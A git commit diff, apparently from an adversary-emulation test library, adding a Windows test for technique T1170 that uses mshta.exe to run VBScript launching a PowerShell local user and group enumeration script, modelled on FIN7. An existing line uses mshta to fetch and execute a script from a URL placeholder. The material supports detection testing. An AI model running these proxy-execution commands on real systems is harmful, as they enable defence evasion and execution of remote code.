T1170 mshta.exe to execute vb script to execute code (#611)

* start work

* add powershell script to list local users and groups

* remove extra command
This commit is contained in:
Andrew Beers
2019-11-07 13:10:59 -08:00
committed by Michael Haag
parent 239ea1c6b0
commit 2f9e306ec2
2 changed files with 19 additions and 1 deletions
+17 -1
View File
@@ -18,4 +18,20 @@ atomic_tests:
elevation_required: false
command: |
mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
- name: Mshta executes VBScript to execute malicious code
description: |
Run a local VB script to run local user enumeration powershell command
This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.
supported_platforms:
- windows
input_arguments:
atomics_path:
description: path to atomics folder
type: path
default: ..\..\atomics
executor:
name: command_prompt
command: |
mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
+2
View File
@@ -0,0 +1,2 @@
Get-LocalUser
Get-LocalGroup